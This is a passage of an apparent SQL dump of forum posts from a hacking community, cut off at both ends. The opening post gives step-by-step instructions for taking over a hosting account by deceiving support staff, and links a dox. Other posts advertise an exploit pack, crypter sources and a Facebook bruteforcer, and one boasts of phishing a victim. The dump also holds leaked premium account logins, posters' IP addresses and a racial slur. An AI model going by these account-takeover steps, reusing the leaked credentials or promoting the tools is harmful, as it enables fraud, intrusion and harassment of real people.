password reset because my email has been hacked as well. I would highly appreciate it, if you could help me out in retrieving my account. I need to regain access to my account ASAP before the hacker harms my members or my website [/quote] [b]Step 4[/b] They will ask for the username, say you don\'t really remember because you always used your email or domain to login. [color=#FF0000][b]CHECK OUT THE LOGIN PAGE AND USE THE APPROPRIATE REASON!!! [/b][/color] If it\'s email, then say you have lost access to your email because it has been hacked!!! [b]Step 5[/b] They might ask you some questions and most likely the security question, answer it wrong and say it is the correct one, please give it a another try. They will say it\'s wrong, say it\'s the correct answer maybe someone changed it. [b]Step 6[/b] I\'m sure they will ask for what email you used to make a Payment, then provide them with the email and say but I lost access to it as well because I don\'t know how but the hacker hacked all my accounts. [b]Step 7[/b] I guess now they will now ask for your new email. Provide them with the fake email and now you have successfully taken over the domain. This is my personal method and I used this before to hack xhostfire hosting, I had a DOX so it was easy for me. Link to DOX: http://pastebin.com/eXVxALWX', '41.174.14.60', '699272764', '0', '0', '10', '1345593976', '1', '6ca4b4d1afbbdf33cf0903ad13b5dd6f', '0', '1345593976'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('589', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '1', 't3h jok3r', '1345594547', 'I have no idea either, I guess hip hop is when it contains break dance because not all rap songs contain break dance.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '72eae727e46b0caf470e45c37bc9bb35', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('590', '79', '189', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '1', 't3h jok3r', '1345594959', 'It sure is funny but useful as well. I fucked up many niggas with this tricks and I love it.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '2d7f0dac9a9a2cb39e248258477c3154', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('591', '133', '339', '23', 'RE: Online Scanners list', '0', '61', 'NXK', '1345595162', 'Thank you very much for this.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '80fb7c526003af1988d2e35445a66e4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('592', '157', '453', '15', 'RE: Eleonore Exp 1.2 Expliot pack', '0', '1', 't3h jok3r', '1345595227', 'How the fuck did such a great exploit get ignored? BTW, can you make this giveaway post here and PM me please? You can save the download link in your personal notepad.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', '596d7fb129a1dbe0f34840a6c829ff82', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('593', '179', '0', '34', '[tut] Multiple 3D text tutorials', '0', '1', 't3h jok3r', '1345595286', '[align=center][IMG]http://i.imgur.com/swu7N.png[/IMG][/align] Here is the long awaited NEW 3D text tutorial. This is fully explained including text commentary in notepad. It also contains NO keyboard short cuts. This means this tutorial IS user friendly. [color=#00BFFF][b]Here are some examples of what can be created:[/b][/color] [img]http://i.imgur.com/wd7m2.jpg[/img] [img]http://i.imgur.com/8djuQ.png[/img] [img]http://i.imgur.com/aQcIl.jpg[/img] [color=#FF1493]Download links: [/color] [url=http://rapidshare.com/#!download|865l36|441117250|__HOT___-_Gabber_s_NEW_3D_Text_Tutorial___HQ__.rar|29672][img]http://www.multiupload.com/logos/5.gif[/img][/url] [url=http://www.megaupload.com/?d=X469M79U][img]http://www.multiupload.com/logos/1.gif[/img][/url] [url=http://hotfile.com/dl/94712669/872779d/_HOT__-_Gabbers_NEW_3D_Text_Tutorial__HQ_.rar.html][img]http://www.multiupload.com/logos/9.gif[/img][/url] [url=http://www.zshare.net/download/84837132e2d3ed1f/][img]http://www.multiupload.com/logos/6.gif[/img][/url] [url=http://uploading.com/files/mbf83c5b/%255B%2BHOT%2B%255D%2B-%2BGabber%2527s%2BNEW%2B3D%2BText%2BTutorial%2B%255B%2BHQ%2B%255D.rar/][img]http://www.multiupload.com/logos/10.gif[/img][/url] [url=http://depositfiles.com/en/files/v7rup39zx][img]http://www.multiupload.com/logos/7.gif[/img][/url] [b][color=#98FB98]Click on the download mirror image to download![/color][/b] [hr][hr][hr][hr][hr][hr] [b][color=#FF0000][size=x-large]This tutorial took:[/size][/color][/b] [size=medium] [b][color=#FFD700]::[/color][/b] 40 minutes to compile and make. [b][color=#FFD700]::[/color][/b] 20 minutes to repair the .avi file. [b][color=#FFD700]::[/color][/b] 10 minutes to get it uploaded. [b][color=#FFD700]::[/color][/b] 20 minutes to make the thread.[/size] [b][color=#FF0000][size=large]It only takes 5 seconds to say thank you![/size][/color][/b]', '41.174.14.60', '699272764', '1', '0', '1', '1345595321', '1', 'db770335387098cbd01f207525ee35ca', '0', '1345595321'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('594', '157', '592', '15', 'RE: Eleonore Exp 1.2 Expliot pack', '0', '61', 'NXK', '1345595317', '[quote=\'t3h jok3r\' pid=\'592\' dateline=\'1345595227\'] How the fuck did such a great exploit get ignored? BTW, can you make this giveaway post here and PM me please? You can save the download link in your personal notepad. [/quote] Done I guess Just post here and PM me for this :)!', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', 'f80465c111b6509234da50da8c52b395', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('595', '180', '0', '20', '[Free]Saddam\'s Crypter VB.Net source and +19 more![No surveys]', '0', '17', 'khade009', '1345595411', 'I now got many crypter sources, and i decided to share it here. Download links: You can download Saddam\'s crypter source here: http://adf.ly/C5jUD Password can be found at dl page. And if you want to get 19 more, download the pack here: http://cur.lv/2xdj C#,C++,VB6,VB2010 download: VISUAL BASIC 2010 EXPRESS: http://www.microsoft.com/visualstudio/en...ic-express VISUAL C# 2010 EXPRESS: http://www.microsoft.com/visualstudio/en...rp-express VISUAL C++ 2010 EXPRESS: http://www.microsoft.com/visualstudio/en...pp-express Visual Basic 6.0: http://www.microsoft.com/download/en/con...x?id=20429 I hope it helps.', '41.174.14.60', '699272764', '0', '0', '0', '0', '1', '8acf03b98c11009cce3464d6968defc1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('596', '157', '453', '15', 'RE: Eleonore Exp 1.2 Expliot pack', '0', '1', 't3h jok3r', '1345595502', 'OK, that was too slow. Lol JK. Thanks, I think just post here would be OK because some people require 10 posts in order to PM.', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', 'dac945ab4ae30a58887011d4ed93ea89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('597', '167', '572', '4', 'RE: iTzIpod is here (:', '0', '82', 'iTzIpod', '1345595552', '[quote=\'t3h jok3r\' pid=\'572\' dateline=\'1345586993\'] [quote=\'iTzIpod\' pid=\'554\' dateline=\'1345558818\'] @Timmy, thanks for the welcome. But please call my Jacob :p Also @t3h jok3r, thanks for the welcome. Also, LOL why don\'t you got a PSN ID? :/ [/quote] It\'s just I don\'t want to get hacked ;) I also don\'t get much time so play alone at the night. f [/quote] Smart thinking.. :p Speaking of getting hacked. I hacked a guy on PSN. :p I made a phisher and he was my first victim.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '49f71f6220199eb367e309c34bb5f641', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('598', '174', '576', '3', 'RE: Coders Group Released', '0', '82', 'iTzIpod', '1345595734', 'Alright. Thanks for the heads up. =] I would love to join but I don\'t got any Coding Knowledge/Experience. :/', '24.212.197.164', '416597412', '1', '0', '82', '1345596488', '1', '65cfb04f601d4afea090895caeaeebb6', '0', '1345596488'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('599', '59', '577', '42', 'RE: 13 year old visits jail for hacking', '0', '82', 'iTzIpod', '1345595833', '[quote=\'t3h jok3r\' pid=\'577\' dateline=\'1345590490\'] [quote=\'iTzIpod\' pid=\'561\' dateline=\'1345559517\'] [quote=\'spacefish36\' pid=\'540\' dateline=\'1345556778\'] [quote=\'iTzIpod\' pid=\'522\' dateline=\'1345554867\'] OMG I remember that show. It was like the best :p OT: It is a program. And it is a good thing he stopped. [/quote] What program are you talking about? [/quote] Beyond Scared Straight is a program that tries to convince the kids not to do the wrong things. And tries to make them change the path they are walking in. I don\'t know how to explain it. But if you watch the show, then you would notice it. [/quote] :roflol: My bad, I don\'t know what I was up to this morning, when you said it\'s a program I thought you said a computing program. [/quote] LOL! Sorry I guess I wasn\'t specific enough :/ :thinking:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '00963ed7d3530544f170c8ec24bfe0c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('600', '175', '579', '42', 'RE: Is Apple really the most valuable company?', '0', '82', 'iTzIpod', '1345595912', 'I\'m an Apple fan :p If you see in my name, it says \"Ipod\" =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '38138c1019f9ba06f4b429643774bc31', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('601', '79', '590', '29', 'RE: [tut]How to ruin somones life[DOX]', '0', '82', 'iTzIpod', '1345596058', '[quote=\'t3h jok3r\' pid=\'590\' dateline=\'1345594959\'] It sure is funny but useful as well. I fucked up many niggas with this tricks and I love it. [/quote] I would do it if I hate someone. But like I said earlier I don\'t hate anyone so... :whistle: And I might not got the guts to do so.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '59b184db759782665062e6ca9c639ddd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('602', '171', '589', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1345596178', '[quote=\'t3h jok3r\' pid=\'589\' dateline=\'1345594547\'] I have no idea either, I guess hip hop is when it contains break dance because not all rap songs contain break dance. [/quote] You\'re right about the rap part. I just noticed that :p I will find it very hard for someone to Breakdance to Drake :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7ae10705a927e45c79eda21b3050b3ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('603', '160', '462', '9', 'RE: $$$Sh@recash Moneymaking$$$', '0', '82', 'iTzIpod', '1345596282', 'It still doesn\'t work. I can\'t click on the link.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fc2e403087067ff7b9aa6a0113b280fc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('604', '174', '576', '3', 'RE: Coders Group Released', '0', '20', 'JakeUS', '1345596349', 'I won\'t be joining since I know nothing about coding. How much do groups cost now?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '39b368500375bcf7b12ea0a9042660ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('605', '181', '0', '54', 'Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '1', 't3h jok3r', '1345596736', 'Brazzers : Here : http://www.restfile.net/q9y7sq7rp0bu/brazzzers.txt.html Xhamster : Here : http://www.restfile.net/bp2svhmp2ry2/xhamster.txt.html Gfrevenge : Here : http://www.restfile.net/s86apm58tp4y/gfrevenge.txt.html Mofos : Here : http://www.restfile.net/w60t1bmez1sx/mofoss.txt.html Youjizz : Here : http://www.restfile.net/t2e0w8qybczf/youjizzz.txt.html Livejasmin : Here : http://www.restfile.net/mhob4dp1h9c0/Liv...n.txt.html', '41.174.14.60', '699272764', '1', '0', '0', '0', '1', 'cdc7bca81d77bfcc2dbed80e1dcd55e3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('606', '165', '492', '5', 'RE: Just did something', '0', '20', 'JakeUS', '1345597060', 'Just posted a new thread advertising this one.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', '5a3a1219e357a751c2afc3c864d9c09f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('607', '164', '484', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1345597357', 'Thanks for your feedbacks. I\'m glad that many people are liking their upgrades. Just to let you guys know, that you guys can now self-close threads.', '41.174.23.122', '699275130', '1', '0', '0', '0', '1', '59f4b60b6d9e82445521d190940c00af', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('608', '174', '576', '3', 'RE: Coders Group Released', '0', '1', 't3h jok3r', '1345597536', 'For all join requests etc, please contact HoverCatz. Groups are free, you would just need to request one. I keep on forgetting on adding a groups forum, but hopefully it will be up by tomorrow. You would be able to request new groups there. I will be making free groups for a long term.', '41.174.23.122', '699275130', '1', '0', '0', '0', '1', '475a75205e559b05140b8bf85f4a69d4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('609', '165', '492', '5', 'RE: Just did something', '0', '1', 't3h jok3r', '1345597603', 'That\'s great. Thanks for helping LH out with advertising, I highly appreciate it.', '41.174.23.122', '699275130', '1', '0', '0', '0', '1', '1b74dbb136da39d34ebd368f2730bbb3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('610', '43', '519', '7', 'RE: How did you find us?', '0', '87', 'Hostpro', '1345631532', '[quote=\'iTzIpod\' pid=\'519\' dateline=\'1345554314\'] I came here from a T3h Jok3r. Thanks for showing me it. This is an awesome forum. And I will be active. =] [/quote] You came here from the profiters lol*', '94.11.244.95', '1577841759', '0', '0', '0', '0', '1', '2ba7527247c8e830e9a3c77e2fdf35a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('611', '181', '605', '54', 'RE: Fresh 22 Aug HoT [ Brazzers / Mofos / Xhamster / Youjizz .... MorE ] HoT', '0', '62', 'R?????zo?', '1345634135', 'I tried brazzers one and didn\'t work out for me, thanks for sharing though.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'cba30072306b1d983e922c6d4375ae92', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('612', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '62', 'R?????zo?', '1345634196', 'Thanks for this, I will try today. EDIT: File got removed, please fix the link :)', '94.132.244.168', '1585771688', '1', '0', '62', '1345634238', '1', 'cac0cae3f8ed57a1601f57b2b560f347', '0', '1345634238'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('613', '163', '483', '30', 'RE: [REAL]Facebook Cracker', '0', '1', 't3h jok3r', '1345641367', 'Link updated and yes it is kind of a bruteforcer.', '41.151.192.196', '697811140', '1', '0', '0', '0', '1', 'c2a6d0e9c7133160dd133fd1ae0b2458', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('614', '175', '600', '42', 'RE: Is Apple really the most valuable company?', '0', '1', 't3h jok3r', '1345641476', '[quote=\'iTzIpod\' pid=\'600\' dateline=\'1345595912\'] I\'m an Apple fan :p If you see in my name, it says \"Ipod\" =] [/quote] Honestly, I also like Apple products. What kind of Ipod do you have?', '41.151.192.196', '697811140', '1', '0', '0', '0', '1', 'dae69103f08be24e004327b581dc6abe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('615', '59', '599', '42', 'RE: 13 year old visits jail for hacking', '0', '1', 't3h jok3r', '1345641562', '[quote=\'iTzIpod\' pid=\'599\' dateline=\'1345595833\'] [quote=\'t3h jok3r\' pid=\'577\' dateline=\'1345590490\'] [quote=\'iTzIpod\' pid=\'561\' dateline=\'1345559517\'] [quote=\'spacefish36\' pid=\'540\' dateline=\'1345556778\'] [quote=\'iTzIpod\' pid=\'522\' dateline=\'1345554867\'] OMG I remember that show. It was like the best :p OT: It is a program. And it is a good thing he stopped. [/quote] What program are you talking about? [/quote] Beyond Scared Straight is a program that tries to convince the kids not to do the wrong things. And tries to make them change the path they are walking in. I don\'t know how to explain it. But if you watch the show, then you would notice it. [/quote] :roflol: My bad, I don\'t know what I was up to this morning, when you said it\'s a program I thought you said a computing program. [/quote] LOL! Sorry I guess I wasn\'t specific enough :/ :thinking: [/quote] It\'s OK lol I should have thought about it twice.', '41.151.192.196', '697811140', '1', '0', '0', '0', '1', 'ef35f94ecba2651cdfbc1ef52351437b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('616', '43', '610', '7', 'RE: How did you find us?', '0', '82', 'iTzIpod', '1345644904', '[quote=\'Hostpro\' pid=\'610\' dateline=\'1345631532\'] [quote=\'iTzIpod\' pid=\'519\' dateline=\'1345554314\'] I came here from a T3h Jok3r. Thanks for showing me it. This is an awesome forum. And I will be active. =] [/quote] You came here from the profiters lol* [/quote] You can\'t keep secrets? :P', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bed72ab1749461633489aaffe32cb17e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('617', '175', '614', '42', 'RE: Is Apple really the most valuable company?', '0', '82', 'iTzIpod', '1345645081', '[quote=\'t3h jok3r\' pid=\'614\' dateline=\'1345641476\'] [quote=\'iTzIpod\' pid=\'600\' dateline=\'1345595912\'] I\'m an Apple fan :p If you see in my name, it says \"Ipod\" =] [/quote] Honestly, I also like Apple products. What kind of Ipod do you have? [/quote] I got an iPod Touch 4th Generation 32GB. I really want the iPod Touch 5th Generation when it comes out though! Look at the features. http://www.apple.com/ios/features.html', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '876c7e92a47be5b44c6de456bc16dfdf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('618', '164', '607', '28', 'RE: Experiences on your upgrade..', '0', '82', 'iTzIpod', '1345645289', '[quote=\'t3h jok3r\' pid=\'607\' dateline=\'1345597357\'] Thanks for your feedbacks. I\'m glad that many people are liking their upgrades. Just to let you guys know, that you guys can now self-close threads. [/quote] I noticed that button. I thought that my thread was closed xD and then I hovered my mouse over it and it said Close Thread. I was like alright. It\'s probably because I\'m Upgraded. So I checked the Upgrade page and was like Oh. Alright then. Nice feature. It will be useful! =]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa8e43ca6b410f3d65967e37d7c5814d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('619', '182', '0', '49', 'Upgraded Forum', '0', '82', 'iTzIpod', '1345647134', 'Hey LH. I want there to be a Sub Forum in the Upgraded Section. And that would be the Elite Request Sub Forum. So basically in that forum, you get to request any account, eBook, program,serial keys etc. And the account can be an account for anything. But if it is for a game, don\'t expect someone to give you a Runescape account with 500 Million Gold or whatever. Just accounts as in Netflix, Rapidshare, DollarFiles, FileIce, etc. All Accounts must be [b]PREMIUM[/b]. And you can also request other things such as programs that are cracked and tested + virus scan included. Programs like Youtube Account Creators, Hotmail Account Creators, etc. Serial Keys for programs like Adobe Photoshop CS6, Microsoft Office Set, etc. eBooks on how to make money, how to SE, etc.', '24.212.197.164', '416597412', '1', '0', '82', '1345647221', '1', '98e9773b0204ae13394a7f4c724e4e93', '0', '1345647221'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('620', '183', '0', '54', '2x PlayBoy Premium', '0', '54', 'Sin Cara', '1345647979', '[code]helper23 - 86MILLIE bz350z - 5uperman [/code] Enjoy;)', '119.154.28.197', '2006588613', '1', '0', '0', '0', '1', 'bc3b1a9174cce5ae1612c8d35e817e8e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('621', '160', '462', '9', 'RE: $$$Sh@recash Moneymaking$$$', '0', '53', 'sirchamp', '1345648605', 'Check your pm. I sent you the mediafirelink.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '381b4580bfeeaf83cd62f5af20d08942', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('622', '184', '0', '35', '[Video] I\'m a video editor!', '8', '61', 'NXK', '1345652411', 'So if you\'re a gamer, and you got a beast clip? Let me know! Iv been editing for a while now and id say i\'m finally starting to get good. Example of my work [video=youtube]http://www.youtube.com/watch?v=A6PkGu5fmwo[/video] If you have anything you\'d like edited let me know.', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '66b2fe09837ff33a1ac112e62ca34896', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('623', '160', '462', '9', 'RE: $$$Sh@recash Moneymaking$$$', '0', '82', 'iTzIpod', '1345654461', 'Ok I received it. Thanks!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3e7ab84ba68a6e8a76502e839061d4df', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('624', '164', '618', '28', 'RE: Experiences on your upgrade..', '0', '1', 't3h jok3r', '1345665814', '[quote=\'iTzIpod\' pid=\'618\' dateline=\'1345645289\'] [quote=\'t3h jok3r\' pid=\'607\' dateline=\'1345597357\'] Thanks for your feedbacks. I\'m glad that many people are liking their upgrades. Just to let you guys know, that you guys can now self-close threads. [/quote] I noticed that button. I thought that my thread was closed xD and then I hovered my mouse over it and it said Close Thread. I was like alright. It\'s probably because I\'m Upgraded. So I checked the Upgrade page and was like Oh. Alright then. Nice feature. It will be useful! =] [/quote] Honestly, this feature existed since the start but because we switched to a new theme, the feature couldn\'t be written on the new theme. I believe all our features are working properly now.', '41.174.7.146', '699271058', '1', '0', '0', '0', '1', 'c91e5522dd9a16f30434bbfd1f3b7a9c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('625', '43', '616', '7', 'RE: How did you find us?', '0', '1', 't3h jok3r', '1345666614', '[quote=\'iTzIpod\' pid=\'616\' dateline=\'1345644904\'] [quote=\'Hostpro\' pid=\'610\' dateline=\'1345631532\'] [quote=\'iTzIpod\' pid=\'519\' dateline=\'1345554314\'] I came here from a T3h Jok3r. Thanks for showing me it. This is an awesome forum. And I will be active. =] [/quote] You came here from the profiters lol* [/quote] You can\'t keep secrets? :P [/quote] Lol I knew you joined from Profiters but I got confused when you took my username.', '41.174.7.146', '699271058', '1', '0', '0', '0', '1', 'd7ea7121dbf76d4761b188e8d3d4fe6a', '0', 